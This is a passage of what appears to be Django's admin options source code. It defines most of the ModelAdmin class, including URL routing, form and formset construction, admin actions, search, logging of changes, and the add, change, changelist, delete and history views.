the add, change or delete views. Use `ModelAdmin.has_(add|change|delete)_permission` for that. """ return request.user.has_module_perms(self.opts.app_label) @python_2_unicode_compatible class ModelAdmin(BaseModelAdmin): "Encapsulates all admin options and functionality for a given model." list_display = ('__str__',) list_display_links = () list_filter = () list_select_related = False list_per_page = 100 list_max_show_all = 200 list_editable = () search_fields = () date_hierarchy = None save_as = False save_on_top = False paginator = Paginator preserve_filters = True inlines = [] # Custom templates (designed to be over-ridden in subclasses) add_form_template = None change_form_template = None change_list_template = None delete_confirmation_template = None delete_selected_confirmation_template = None object_history_template = None # Actions actions = [] action_form = helpers.ActionForm actions_on_top = True actions_on_bottom = False actions_selection_counter = True checks_class = ModelAdminChecks def __init__(self, model, admin_site): self.model = model self.opts = model._meta self.admin_site = admin_site super(ModelAdmin, self).__init__() def __str__(self): return "%s.%s" % (self.model._meta.app_label, self.__class__.__name__) def get_inline_instances(self, request, obj=None): inline_instances = [] for inline_class in self.inlines: inline = inline_class(self.model, self.admin_site) if request: if not (inline.has_add_permission(request) or inline.has_change_permission(request, obj) or inline.has_delete_permission(request, obj)): continue if not inline.has_add_permission(request): inline.max_num = 0 inline_instances.append(inline) return inline_instances def get_urls(self): from django.conf.urls import url def wrap(view): def wrapper(*args, **kwargs): return self.admin_site.admin_view(view)(*args, **kwargs) wrapper.model_admin = self return update_wrapper(wrapper, view) info = self.model._meta.app_label, self.model._meta.model_name urlpatterns = [ url(r'^$', wrap(self.changelist_view), name='%s_%s_changelist' % info), url(r'^add/$', wrap(self.add_view), name='%s_%s_add' % info), url(r'^(.+)/history/$', wrap(self.history_view), name='%s_%s_history' % info), url(r'^(.+)/delete/$', wrap(self.delete_view), name='%s_%s_delete' % info), url(r'^(.+)/change/$', wrap(self.change_view), name='%s_%s_change' % info), # For backwards compatibility (was the change url before 1.9) url(r'^(.+)/$', wrap(RedirectView.as_view( pattern_name='%s:%s_%s_change' % ((self.admin_site.name,) + info) ))), ] return urlpatterns def urls(self): return self.get_urls() urls = property(urls) @property def media(self): extra = '' if settings.DEBUG else '.min' js = [ 'core.js', 'admin/RelatedObjectLookups.js', 'vendor/jquery/jquery%s.js' % extra, 'jquery.init.js', 'actions%s.js' % extra, 'urlify.js', 'prepopulate%s.js' % extra, 'vendor/xregexp/xregexp.min.js', ] return forms.Media(js=[static('admin/js/%s' % url) for url in js]) def get_model_perms(self, request): """ Returns a dict of all perms for this model. This dict has the keys ``add``, ``change``, and ``delete`` mapping to the True/False for each of those actions. """ return { 'add': self.has_add_permission(request), 'change': self.has_change_permission(request), 'delete': self.has_delete_permission(request), } def get_fields(self, request, obj=None): if self.fields: return self.fields form = self.get_form(request, obj, fields=None) return list(form.base_fields) + list(self.get_readonly_fields(request, obj)) def get_form(self, request, obj=None, **kwargs): """ Returns a Form class for use in the admin add view. This is used by add_view and change_view. """ if 'fields' in kwargs: fields = kwargs.pop('fields') else: fields = flatten_fieldsets(self.get_fieldsets(request, obj)) if self.exclude is None: exclude = [] else: exclude = list(self.exclude) readonly_fields = self.get_readonly_fields(request, obj) exclude.extend(readonly_fields) if self.exclude is None and hasattr(self.form, '_meta') and self.form._meta.exclude: # Take the custom ModelForm's Meta.exclude into account only if the # ModelAdmin doesn't define its own. exclude.extend(self.form._meta.exclude) # if exclude is an empty list we pass None to be consistent with the # default on modelform_factory exclude = exclude or None # Remove declared form fields which are in readonly_fields. new_attrs = OrderedDict( (f, None) for f in readonly_fields if f in self.form.declared_fields ) form = type(self.form.__name__, (self.form,), new_attrs) defaults = { "form": form, "fields": fields, "exclude": exclude, "formfield_callback": partial(self.formfield_for_dbfield, request=request), } defaults.update(kwargs) if defaults['fields'] is None and not modelform_defines_fields(defaults['form']): defaults['fields'] = forms.ALL_FIELDS try: return modelform_factory(self.model, **defaults) except FieldError as e: raise FieldError('%s. Check fields/fieldsets/exclude attributes of class %s.' % (e, self.__class__.__name__)) def get_changelist(self, request, **kwargs): """ Returns the ChangeList class for use on the changelist page. """ from django.contrib.admin.views.main import ChangeList return ChangeList def get_object(self, request, object_id, from_field=None): """ Returns an instance matching the field and value provided, the primary key is used if no field is provided. Returns ``None`` if no match is found or the object_id fails validation. """ queryset = self.get_queryset(request) model = queryset.model field = model._meta.pk if from_field is None else model._meta.get_field(from_field) try: object_id = field.to_python(object_id) return queryset.get(**{field.name: object_id}) except (model.DoesNotExist, ValidationError, ValueError): return None def get_changelist_form(self, request, **kwargs): """ Returns a Form class for use in the Formset on the changelist page. """ defaults = { "formfield_callback": partial(self.formfield_for_dbfield, request=request), } defaults.update(kwargs) if (defaults.get('fields') is None and not modelform_defines_fields(defaults.get('form'))): defaults['fields'] = forms.ALL_FIELDS return modelform_factory(self.model, **defaults) def get_changelist_formset(self, request, **kwargs): """ Returns a FormSet class for use on the changelist page if list_editable is used. """ defaults = { "formfield_callback": partial(self.formfield_for_dbfield, request=request), } defaults.update(kwargs) return modelformset_factory(self.model, self.get_changelist_form(request), extra=0, fields=self.list_editable, **defaults) def get_formsets_with_inlines(self, request, obj=None): """ Yields formsets and the corresponding inlines. """ for inline in self.get_inline_instances(request, obj): yield inline.get_formset(request, obj), inline def get_paginator(self, request, queryset, per_page, orphans=0, allow_empty_first_page=True): return self.paginator(queryset, per_page, orphans, allow_empty_first_page) def log_addition(self, request, object, message): """ Log that an object has been successfully added. The default implementation creates an admin LogEntry object. """ from django.contrib.admin.models import LogEntry, ADDITION LogEntry.objects.log_action( user_id=request.user.pk, content_type_id=get_content_type_for_model(object).pk, object_id=object.pk, object_repr=force_text(object), action_flag=ADDITION, change_message=message, ) def log_change(self, request, object, message): """ Log that an object has been successfully changed. The default implementation creates an admin LogEntry object. """ from django.contrib.admin.models import LogEntry, CHANGE LogEntry.objects.log_action( user_id=request.user.pk, content_type_id=get_content_type_for_model(object).pk, object_id=object.pk, object_repr=force_text(object), action_flag=CHANGE, change_message=message, ) def log_deletion(self, request, object, object_repr): """ Log that an object will be deleted. Note that this method must be called before the deletion. The default implementation creates an admin LogEntry object. """ from django.contrib.admin.models import LogEntry, DELETION LogEntry.objects.log_action( user_id=request.user.pk, content_type_id=get_content_type_for_model(object).pk, object_id=object.pk, object_repr=object_repr, action_flag=DELETION, ) def action_checkbox(self, obj): """ A list_display column containing a checkbox widget. """ return helpers.checkbox.render(helpers.ACTION_CHECKBOX_NAME, force_text(obj.pk)) action_checkbox.short_description = mark_safe('<input type="checkbox" id="action-toggle" />') action_checkbox.allow_tags = True def get_actions(self, request): """ Return a dictionary mapping the names of all actions for this ModelAdmin to a tuple of (callable, name, description) for each action. """ # If self.actions is explicitly set to None that means that we don't # want *any* actions enabled on this page. if self.actions is None or IS_POPUP_VAR in request.GET: return OrderedDict() actions = [] # Gather actions from the admin site first for (name, func) in self.admin_site.actions: description = getattr(func, 'short_description', name.replace('_', ' ')) actions.append((func, name, description)) # Then gather them from the model admin and all parent classes, # starting with self and working back up. for klass in self.__class__.mro()[::-1]: class_actions = getattr(klass, 'actions', []) # Avoid trying to iterate over None if not class_actions: continue actions.extend(self.get_action(action) for action in class_actions) # get_action might have returned None, so filter any of those out. actions = filter(None, actions) # Convert the actions into an OrderedDict keyed by name. actions = OrderedDict( (name, (func, name, desc)) for func, name, desc in actions ) return actions def get_action_choices(self, request, default_choices=BLANK_CHOICE_DASH): """ Return a list of choices for use in a form object. Each choice is a tuple (name, description). """ choices = [] + default_choices for func, name, description in six.itervalues(self.get_actions(request)): choice = (name, description % model_format_dict(self.opts)) choices.append(choice) return choices def get_action(self, action): """ Return a given action from a parameter, which can either be a callable, or the name of a method on the ModelAdmin. Return is a tuple of (callable, name, description). """ # If the action is a callable, just use it. if callable(action): func = action action = action.__name__ # Next, look for a method. Grab it off self.__class__ to get an unbound # method instead of a bound one; this ensures that the calling # conventions are the same for functions and methods. elif hasattr(self.__class__, action): func = getattr(self.__class__, action) # Finally, look for a named method on the admin site else: try: func = self.admin_site.get_action(action) except KeyError: return None if hasattr(func, 'short_description'): description = func.short_description else: description = capfirst(action.replace('_', ' ')) return func, action, description def get_list_display(self, request): """ Return a sequence containing the fields to be displayed on the changelist. """ return self.list_display def get_list_display_links(self, request, list_display): """ Return a sequence containing the fields to be displayed as links on the changelist. The list_display parameter is the list of fields returned by get_list_display(). """ if self.list_display_links or self.list_display_links is None or not list_display: return self.list_display_links else: # Use only the first item in list_display as link return list(list_display)[:1] def get_list_filter(self, request): """ Returns a sequence containing the fields to be displayed as filters in the right sidebar of the changelist page. """ return self.list_filter def get_list_select_related(self, request): """ Returns a list of fields to add to the select_related() part of the changelist items query. """ return self.list_select_related def get_search_fields(self, request): """ Returns a sequence containing the fields to be searched whenever somebody submits a search query. """ return self.search_fields def get_search_results(self, request, queryset, search_term): """ Returns a tuple containing a queryset to implement the search, and a boolean indicating if the results may contain duplicates. """ # Apply keyword searches. def construct_search(field_name): if field_name.startswith('^'): return "%s__istartswith" % field_name[1:] elif field_name.startswith('='): return "%s__iexact" % field_name[1:] elif field_name.startswith('@'): return "%s__search" % field_name[1:] else: return "%s__icontains" % field_name use_distinct = False search_fields = self.get_search_fields(request) if search_fields and search_term: orm_lookups = [construct_search(str(search_field)) for search_field in search_fields] for bit in search_term.split(): or_queries = [models.Q(**{orm_lookup: bit}) for orm_lookup in orm_lookups] queryset = queryset.filter(reduce(operator.or_, or_queries)) if not use_distinct: for search_spec in orm_lookups: if lookup_needs_distinct(self.opts, search_spec): use_distinct = True break return queryset, use_distinct def get_preserved_filters(self, request): """ Returns the preserved filters querystring. """ match = request.resolver_match if self.preserve_filters and match: opts = self.model._meta current_url = '%s:%s' % (match.app_name, match.url_name) changelist_url = 'admin:%s_%s_changelist' % (opts.app_label, opts.model_name) if current_url == changelist_url: preserved_filters = request.GET.urlencode() else: preserved_filters = request.GET.get('_changelist_filters') if preserved_filters: return urlencode({'_changelist_filters': preserved_filters}) return '' def construct_change_message(self, request, form, formsets, add=False): """ Construct a change message from a changed object. """ change_message = [] if add: change_message.append(_('Added.')) elif form.changed_data: change_message.append(_('Changed %s.') % get_text_list(form.changed_data, _('and'))) if formsets: for formset in formsets: for added_object in formset.new_objects: change_message.append(_('Added %(name)s "%(object)s".') % {'name': force_text(added_object._meta.verbose_name), 'object': force_text(added_object)}) for changed_object, changed_fields in formset.changed_objects: change_message.append(_('Changed %(list)s for %(name)s "%(object)s".') % {'list': get_text_list(changed_fields, _('and')), 'name': force_text(changed_object._meta.verbose_name), 'object': force_text(changed_object)}) for deleted_object in formset.deleted_objects: change_message.append(_('Deleted %(name)s "%(object)s".') % {'name': force_text(deleted_object._meta.verbose_name), 'object': force_text(deleted_object)}) change_message = ' '.join(change_message) return change_message or _('No fields changed.') def message_user(self, request, message, level=messages.INFO, extra_tags='', fail_silently=False): """ Send a message to the user. The default implementation posts a message using the django.contrib.messages backend. Exposes almost the same API as messages.add_message(), but accepts the positional arguments in a different order to maintain backwards compatibility. For convenience, it accepts the `level` argument as a string rather than the usual level number. """ if not isinstance(level, int): # attempt to get the level if passed a string try: level = getattr(messages.constants, level.upper()) except AttributeError: levels = messages.constants.DEFAULT_TAGS.values() levels_repr = ', '.join('`%s`' % l for l in levels) raise ValueError('Bad message level string: `%s`. ' 'Possible values are: %s' % (level, levels_repr)) messages.add_message(request, level, message, extra_tags=extra_tags, fail_silently=fail_silently) def save_form(self, request, form, change): """ Given a ModelForm return an unsaved instance. ``change`` is True if the object is being changed, and False if it's being added. """ return form.save(commit=False) def save_model(self, request, obj, form, change): """ Given a model instance save it to the database. """ obj.save() def delete_model(self, request, obj): """ Given a model instance delete it from the database. """ obj.delete() def save_formset(self, request, form, formset, change): """ Given an inline formset save it to the database. """ formset.save() def save_related(self, request, form, formsets, change): """ Given the ``HttpRequest``, the parent ``ModelForm`` instance, the list of inline formsets and a boolean value based on whether the parent is being added or changed, save the related objects to the database. Note that at this point save_form() and save_model() have already been called. """ form.save_m2m() for formset in formsets: self.save_formset(request, form, formset, change=change) def render_change_form(self, request, context, add=False, change=False, form_url='', obj=None): opts = self.model._meta app_label = opts.app_label preserved_filters = self.get_preserved_filters(request) form_url = add_preserved_filters({'preserved_filters': preserved_filters, 'opts': opts}, form_url) view_on_site_url = self.get_view_on_site_url(obj) context.update({ 'add': add, 'change': change, 'has_add_permission': self.has_add_permission(request), 'has_change_permission': self.has_change_permission(request, obj), 'has_delete_permission': self.has_delete_permission(request, obj), 'has_file_field': True, # FIXME - this should check if form or formsets have a FileField, 'has_absolute_url': view_on_site_url is not None, 'absolute_url': view_on_site_url, 'form_url': form_url, 'opts': opts, 'content_type_id': get_content_type_for_model(self.model).pk, 'save_as': self.save_as, 'save_on_top': self.save_on_top, 'to_field_var': TO_FIELD_VAR, 'is_popup_var': IS_POPUP_VAR, 'app_label': app_label, }) if add and self.add_form_template is not None: form_template = self.add_form_template else: form_template = self.change_form_template request.current_app = self.admin_site.name return TemplateResponse(request, form_template or [ "admin/%s/%s/change_form.html" % (app_label, opts.model_name), "admin/%s/change_form.html" % app_label, "admin/change_form.html" ], context) def response_add(self, request, obj, post_url_continue=None): """ Determines the HttpResponse for the add_view stage. """ opts = obj._meta pk_value = obj._get_pk_val() preserved_filters = self.get_preserved_filters(request) msg_dict = {'name': force_text(opts.verbose_name), 'obj': force_text(obj)} # Here, we distinguish between different save types by checking for # the presence of keys in request.POST. if IS_POPUP_VAR in request.POST: to_field = request.POST.get(TO_FIELD_VAR) if to_field: attr = str(to_field) else: attr = obj._meta.pk.attname value = obj.serializable_value(attr) return SimpleTemplateResponse('admin/popup_response.html', { 'value': value, 'obj': obj, }) elif "_continue" in request.POST: msg = _('The %(name)s "%(obj)s" was added successfully. You may edit it again below.') % msg_dict self.message_user(request, msg, messages.SUCCESS) if post_url_continue is None: post_url_continue = reverse('admin:%s_%s_change' % (opts.app_label, opts.model_name), args=(quote(pk_value),), current_app=self.admin_site.name) post_url_continue = add_preserved_filters( {'preserved_filters': preserved_filters, 'opts': opts}, post_url_continue ) return HttpResponseRedirect(post_url_continue) elif "_addanother" in request.POST: msg = _('The %(name)s "%(obj)s" was added successfully. You may add another %(name)s below.') % msg_dict self.message_user(request, msg, messages.SUCCESS) redirect_url = request.path redirect_url = add_preserved_filters({'preserved_filters': preserved_filters, 'opts': opts}, redirect_url) return HttpResponseRedirect(redirect_url) else: msg = _('The %(name)s "%(obj)s" was added successfully.') % msg_dict self.message_user(request, msg, messages.SUCCESS) return self.response_post_save_add(request, obj) def response_change(self, request, obj): """ Determines the HttpResponse for the change_view stage. """ if IS_POPUP_VAR in request.POST: to_field = request.POST.get(TO_FIELD_VAR) attr = str(to_field) if to_field else obj._meta.pk.attname # Retrieve the `object_id` from the resolved pattern arguments. value = request.resolver_match.args[0] new_value = obj.serializable_value(attr) return SimpleTemplateResponse('admin/popup_response.html', { 'action': 'change', 'value': escape(value), 'obj': escapejs(obj), 'new_value': escape(new_value), }) opts = self.model._meta pk_value = obj._get_pk_val() preserved_filters = self.get_preserved_filters(request) msg_dict = {'name': force_text(opts.verbose_name), 'obj': force_text(obj)} if "_continue" in request.POST: msg = _('The %(name)s "%(obj)s" was changed successfully. You may edit it again below.') % msg_dict self.message_user(request, msg, messages.SUCCESS) redirect_url = request.path redirect_url = add_preserved_filters({'preserved_filters': preserved_filters, 'opts': opts}, redirect_url) return HttpResponseRedirect(redirect_url) elif "_saveasnew" in request.POST: msg = _('The %(name)s "%(obj)s" was added successfully. You may edit it again below.') % msg_dict self.message_user(request, msg, messages.SUCCESS) redirect_url = reverse('admin:%s_%s_change' % (opts.app_label, opts.model_name), args=(pk_value,), current_app=self.admin_site.name) redirect_url = add_preserved_filters({'preserved_filters': preserved_filters, 'opts': opts}, redirect_url) return HttpResponseRedirect(redirect_url) elif "_addanother" in request.POST: msg = _('The %(name)s "%(obj)s" was changed successfully. You may add another %(name)s below.') % msg_dict self.message_user(request, msg, messages.SUCCESS) redirect_url = reverse('admin:%s_%s_add' % (opts.app_label, opts.model_name), current_app=self.admin_site.name) redirect_url = add_preserved_filters({'preserved_filters': preserved_filters, 'opts': opts}, redirect_url) return HttpResponseRedirect(redirect_url) else: msg = _('The %(name)s "%(obj)s" was changed successfully.') % msg_dict self.message_user(request, msg, messages.SUCCESS) return self.response_post_save_change(request, obj) def response_post_save_add(self, request, obj): """ Figure out where to redirect after the 'Save' button has been pressed when adding a new object. """ opts = self.model._meta if self.has_change_permission(request, None): post_url = reverse('admin:%s_%s_changelist' % (opts.app_label, opts.model_name), current_app=self.admin_site.name) preserved_filters = self.get_preserved_filters(request) post_url = add_preserved_filters({'preserved_filters': preserved_filters, 'opts': opts}, post_url) else: post_url = reverse('admin:index', current_app=self.admin_site.name) return HttpResponseRedirect(post_url) def response_post_save_change(self, request, obj): """ Figure out where to redirect after the 'Save' button has been pressed when editing an existing object. """ opts = self.model._meta if self.has_change_permission(request, None): post_url = reverse('admin:%s_%s_changelist' % (opts.app_label, opts.model_name), current_app=self.admin_site.name) preserved_filters = self.get_preserved_filters(request) post_url = add_preserved_filters({'preserved_filters': preserved_filters, 'opts': opts}, post_url) else: post_url = reverse('admin:index', current_app=self.admin_site.name) return HttpResponseRedirect(post_url) def response_action(self, request, queryset): """ Handle an admin action. This is called if a request is POSTed to the changelist; it returns an HttpResponse if the action was handled, and None otherwise. """ # There can be multiple action forms on the page (at the top # and bottom of the change list, for example). Get the action # whose button was pushed. try: action_index = int(request.POST.get('index', 0)) except ValueError: action_index = 0 # Construct the action form. data = request.POST.copy() data.pop(helpers.ACTION_CHECKBOX_NAME, None) data.pop("index", None) # Use the action whose button was pushed try: data.update({'action': data.getlist('action')[action_index]}) except IndexError: # If we didn't get an action from the chosen form that's invalid # POST data, so by deleting action it'll fail the validation check # below. So no need to do anything here pass action_form = self.action_form(data, auto_id=None) action_form.fields['action'].choices = self.get_action_choices(request) # If the form's valid we can handle the action. if action_form.is_valid(): action = action_form.cleaned_data['action'] select_across = action_form.cleaned_data['select_across'] func = self.get_actions(request)[action][0] # Get the list of selected PKs. If nothing's selected, we can't # perform an action on it, so bail. Except we want to perform # the action explicitly on all objects. selected = request.POST.getlist(helpers.ACTION_CHECKBOX_NAME) if not selected and not select_across: # Reminder that something needs to be selected or nothing will happen msg = _("Items must be selected in order to perform " "actions on them. No items have been changed.") self.message_user(request, msg, messages.WARNING) return None if not select_across: # Perform the action only on the selected objects queryset = queryset.filter(pk__in=selected) response = func(self, request, queryset) # Actions may return an HttpResponse-like object, which will be # used as the response from the POST. If not, we'll be a good # little HTTP citizen and redirect back to the changelist page. if isinstance(response, HttpResponseBase): return response else: return HttpResponseRedirect(request.get_full_path()) else: msg = _("No action selected.") self.message_user(request, msg, messages.WARNING) return None def response_delete(self, request, obj_display, obj_id): """ Determines the HttpResponse for the delete_view stage. """ opts = self.model._meta if IS_POPUP_VAR in request.POST: return SimpleTemplateResponse('admin/popup_response.html', { 'action': 'delete', 'value': escape(obj_id), }) self.message_user(request, _('The %(name)s "%(obj)s" was deleted successfully.') % { 'name': force_text(opts.verbose_name), 'obj': force_text(obj_display), }, messages.SUCCESS) if self.has_change_permission(request, None): post_url = reverse('admin:%s_%s_changelist' % (opts.app_label, opts.model_name), current_app=self.admin_site.name) preserved_filters = self.get_preserved_filters(request) post_url = add_preserved_filters( {'preserved_filters': preserved_filters, 'opts': opts}, post_url ) else: post_url = reverse('admin:index', current_app=self.admin_site.name) return HttpResponseRedirect(post_url) def render_delete_form(self, request, context): opts = self.model._meta app_label = opts.app_label request.current_app = self.admin_site.name context.update( to_field_var=TO_FIELD_VAR, is_popup_var=IS_POPUP_VAR, ) return TemplateResponse(request, self.delete_confirmation_template or [ "admin/{}/{}/delete_confirmation.html".format(app_label, opts.model_name), "admin/{}/delete_confirmation.html".format(app_label), "admin/delete_confirmation.html" ], context) def get_inline_formsets(self, request, formsets, inline_instances, obj=None): inline_admin_formsets = [] for inline, formset in zip(inline_instances, formsets): fieldsets = list(inline.get_fieldsets(request, obj)) readonly = list(inline.get_readonly_fields(request, obj)) prepopulated = dict(inline.get_prepopulated_fields(request, obj)) inline_admin_formset = helpers.InlineAdminFormSet(inline, formset, fieldsets, prepopulated, readonly, model_admin=self) inline_admin_formsets.append(inline_admin_formset) return inline_admin_formsets def get_changeform_initial_data(self, request): """ Get the initial form data. Unless overridden, this populates from the GET params. """ initial = dict(request.GET.items()) for k in initial: try: f = self.model._meta.get_field(k) except FieldDoesNotExist: continue # We have to special-case M2Ms as a list of comma-separated PKs. if isinstance(f, models.ManyToManyField): initial[k] = initial[k].split(",") return initial @csrf_protect_m @transaction.atomic def changeform_view(self, request, object_id=None, form_url='', extra_context=None): to_field = request.POST.get(TO_FIELD_VAR, request.GET.get(TO_FIELD_VAR)) if to_field and not self.to_field_allowed(request, to_field): raise DisallowedModelAdminToField("The field %s cannot be referenced." % to_field) model = self.model opts = model._meta add = object_id is None if add: if not self.has_add_permission(request): raise PermissionDenied obj = None else: obj = self.get_object(request, unquote(object_id), to_field) if not self.has_change_permission(request, obj): raise PermissionDenied if obj is None: raise Http404(_('%(name)s object with primary key %(key)r does not exist.') % { 'name': force_text(opts.verbose_name), 'key': escape(object_id)}) if request.method == 'POST' and "_saveasnew" in request.POST: object_id = None obj = None ModelForm = self.get_form(request, obj) if request.method == 'POST': form = ModelForm(request.POST, request.FILES, instance=obj) if form.is_valid(): form_validated = True new_object = self.save_form(request, form, change=not add) else: form_validated = False new_object = form.instance formsets, inline_instances = self._create_formsets(request, new_object, change=not add) if all_valid(formsets) and form_validated: self.save_model(request, new_object, form, not add) self.save_related(request, form, formsets, not add) change_message = self.construct_change_message(request, form, formsets, add) if add: self.log_addition(request, new_object, change_message) return self.response_add(request, new_object) else: self.log_change(request, new_object, change_message) return self.response_change(request, new_object) else: form_validated = False else: if add: initial = self.get_changeform_initial_data(request) form = ModelForm(initial=initial) formsets, inline_instances = self._create_formsets(request, form.instance, change=False) else: form = ModelForm(instance=obj) formsets, inline_instances = self._create_formsets(request, obj, change=True) adminForm = helpers.AdminForm( form, list(self.get_fieldsets(request, obj)), self.get_prepopulated_fields(request, obj), self.get_readonly_fields(request, obj), model_admin=self) media = self.media + adminForm.media inline_formsets = self.get_inline_formsets(request, formsets, inline_instances, obj) for inline_formset in inline_formsets: media = media + inline_formset.media context = dict(self.admin_site.each_context(request), title=(_('Add %s') if add else _('Change %s')) % force_text(opts.verbose_name), adminform=adminForm, object_id=object_id, original=obj, is_popup=(IS_POPUP_VAR in request.POST or IS_POPUP_VAR in request.GET), to_field=to_field, media=media, inline_admin_formsets=inline_formsets, errors=helpers.AdminErrorList(form, formsets), preserved_filters=self.get_preserved_filters(request), ) # Hide the "Save" and "Save and continue" buttons if "Save as New" was # previously chosen to prevent the interface from getting confusing. if request.method == 'POST' and not form_validated and "_saveasnew" in request.POST: context['show_save'] = False context['show_save_and_continue'] = False context.update(extra_context or {}) return self.render_change_form(request, context, add=add, change=not add, obj=obj, form_url=form_url) def add_view(self, request, form_url='', extra_context=None): return self.changeform_view(request, None, form_url, extra_context) def change_view(self, request, object_id, form_url='', extra_context=None): return self.changeform_view(request, object_id, form_url, extra_context) @csrf_protect_m def changelist_view(self, request, extra_context=None): """ The 'change list' admin view for this model. """ from django.contrib.admin.views.main import ERROR_FLAG opts = self.model._meta app_label = opts.app_label if not self.has_change_permission(request, None): raise PermissionDenied list_display = self.get_list_display(request) list_display_links = self.get_list_display_links(request, list_display) list_filter = self.get_list_filter(request) search_fields = self.get_search_fields(request) list_select_related = self.get_list_select_related(request) # Check actions to see if any are available on this changelist actions = self.get_actions(request) if actions: # Add the action checkboxes if there are any actions available. list_display = ['action_checkbox'] + list(list_display) ChangeList = self.get_changelist(request) try: cl = ChangeList(request, self.model, list_display, list_display_links, list_filter, self.date_hierarchy, search_fields, list_select_related, self.list_per_page, self.list_max_show_all, self.list_editable, self) except IncorrectLookupParameters: # Wacky lookup parameters were given, so redirect to the main # changelist page, without parameters, and pass an 'invalid=1' # parameter via the query string. If wacky parameters were given # and the 'invalid=1' parameter was already in the query string, # something is screwed up with the database, so display an error # page. if ERROR_FLAG in request.GET.keys(): return SimpleTemplateResponse('admin/invalid_setup.html', { 'title': _('Database error'), }) return HttpResponseRedirect(request.path + '?' + ERROR_FLAG + '=1') # If the request was POSTed, this might be a bulk action or a bulk # edit. Try to look up an action or confirmation first, but if this # isn't an action the POST will fall through to the bulk edit check, # below. action_failed = False selected = request.POST.getlist(helpers.ACTION_CHECKBOX_NAME) # Actions with no confirmation if (actions and request.method == 'POST' and 'index' in request.POST and '_save' not in request.POST): if selected: response = self.response_action(request, queryset=cl.get_queryset(request)) if response: return response else: action_failed = True else: msg = _("Items must be selected in order to perform " "actions on them. No items have been changed.") self.message_user(request, msg, messages.WARNING) action_failed = True # Actions with confirmation if (actions and request.method == 'POST' and helpers.ACTION_CHECKBOX_NAME in request.POST and 'index' not in request.POST and '_save' not in request.POST): if selected: response = self.response_action(request, queryset=cl.get_queryset(request)) if response: return response else: action_failed = True # If we're allowing changelist editing, we need to construct a formset # for the changelist given all the fields to be edited. Then we'll # use the formset to validate/process POSTed data. formset = cl.formset = None # Handle POSTed bulk-edit data. if (request.method == "POST" and cl.list_editable and '_save' in request.POST and not action_failed): FormSet = self.get_changelist_formset(request) formset = cl.formset = FormSet(request.POST, request.FILES, queryset=cl.result_list) if formset.is_valid(): changecount = 0 for form in formset.forms: if form.has_changed(): obj = self.save_form(request, form, change=True) self.save_model(request, obj, form, change=True) self.save_related(request, form, formsets=[], change=True) change_msg = self.construct_change_message(request, form, None) self.log_change(request, obj, change_msg) changecount += 1 if changecount: if changecount == 1: name = force_text(opts.verbose_name) else: name = force_text(opts.verbose_name_plural) msg = ungettext("%(count)s %(name)s was changed successfully.", "%(count)s %(name)s were changed successfully.", changecount) % {'count': changecount, 'name': name, 'obj': force_text(obj)} self.message_user(request, msg, messages.SUCCESS) return HttpResponseRedirect(request.get_full_path()) # Handle GET -- construct a formset for display. elif cl.list_editable: FormSet = self.get_changelist_formset(request) formset = cl.formset = FormSet(queryset=cl.result_list) # Build the list of media to be used by the formset. if formset: media = self.media + formset.media else: media = self.media # Build the action form and populate it with available actions. if actions: action_form = self.action_form(auto_id=None) action_form.fields['action'].choices = self.get_action_choices(request) else: action_form = None selection_note_all = ungettext('%(total_count)s selected', 'All %(total_count)s selected', cl.result_count) context = dict( self.admin_site.each_context(request), module_name=force_text(opts.verbose_name_plural), selection_note=_('0 of %(cnt)s selected') % {'cnt': len(cl.result_list)}, selection_note_all=selection_note_all % {'total_count': cl.result_count}, title=cl.title, is_popup=cl.is_popup, to_field=cl.to_field, cl=cl, media=media, has_add_permission=self.has_add_permission(request), opts=cl.opts, action_form=action_form, actions_on_top=self.actions_on_top, actions_on_bottom=self.actions_on_bottom, actions_selection_counter=self.actions_selection_counter, preserved_filters=self.get_preserved_filters(request), ) context.update(extra_context or {}) request.current_app = self.admin_site.name return TemplateResponse(request, self.change_list_template or [ 'admin/%s/%s/change_list.html' % (app_label, opts.model_name), 'admin/%s/change_list.html' % app_label, 'admin/change_list.html' ], context) @csrf_protect_m @transaction.atomic def delete_view(self, request, object_id, extra_context=None): "The 'delete' admin view for this model." opts = self.model._meta app_label = opts.app_label to_field = request.POST.get(TO_FIELD_VAR, request.GET.get(TO_FIELD_VAR)) if to_field and not self.to_field_allowed(request, to_field): raise DisallowedModelAdminToField("The field %s cannot be referenced." % to_field) obj = self.get_object(request, unquote(object_id), to_field) if not self.has_delete_permission(request, obj): raise PermissionDenied if obj is None: raise Http404( _('%(name)s object with primary key %(key)r does not exist.') % {'name': force_text(opts.verbose_name), 'key': escape(object_id)} ) using = router.db_for_write(self.model) # Populate deleted_objects, a data structure of all related objects that # will also be deleted. (deleted_objects, model_count, perms_needed, protected) = get_deleted_objects( [obj], opts, request.user, self.admin_site, using) if request.POST: # The user has already confirmed the deletion. if perms_needed: raise PermissionDenied obj_display = force_text(obj) attr = str(to_field) if to_field else opts.pk.attname obj_id = obj.serializable_value(attr) self.log_deletion(request, obj, obj_display) self.delete_model(request, obj) return self.response_delete(request, obj_display, obj_id) object_name = force_text(opts.verbose_name) if perms_needed or protected: title = _("Cannot delete %(name)s") % {"name": object_name} else: title = _("Are you sure?") context = dict( self.admin_site.each_context(request), title=title, object_name=object_name, object=obj, deleted_objects=deleted_objects, model_count=dict(model_count).items(), perms_lacking=perms_needed, protected=protected, opts=opts, app_label=app_label, preserved_filters=self.get_preserved_filters(request), is_popup=(IS_POPUP_VAR in request.POST or IS_POPUP_VAR in request.GET), to_field=to_field, ) context.update(extra_context or {}) return self.render_delete_form(request, context) def history_view(self, request, object_id, extra_context=None): "The 'history' admin view for this model." from django.contrib.admin.models import LogEntry # First check if the user can see this history. model = self.model obj = self.get_object(request, unquote(object_id)) if obj is None: raise Http404(_('%(name)s object with primary key %(key)r does not exist.') % { 'name': force_text(model._meta.verbose_name), 'key': escape(object_id), }) if not self.has_change_permission(request, obj): raise PermissionDenied # Then get the history for this object. opts = model._meta app_label = opts.app_label action_list = LogEntry.objects.filter( object_id=unquote(object_id), content_type=get_content_type_for_model(model) ).select_related().order_by('action_time') context = dict(self.admin_site.each_context(request), title=_('Change history: %s') % force_text(obj), action_list=action_list, module_name=capfirst(force_text(opts.verbose_name_plural)), object=obj, opts=opts, preserved_filters=self.get_preserved_filters(request), ) context.update(extra_context or {}) request.current_app = self.admin_site.name return TemplateResponse(request, self.object_history_template or [ "admin/%s/%s/object_history.html" % (app_label, opts.model_name), "admin/%s/object_history.html" % app_label, "admin/object_history.html" ], context) def _create_formsets(self, request, obj, change): "Helper function to generate formsets for add/change_view." formsets = [] inline_instances = [] prefixes = {} get_formsets_args = [request] if change: get_formsets_args.append(obj) for FormSet, inline in 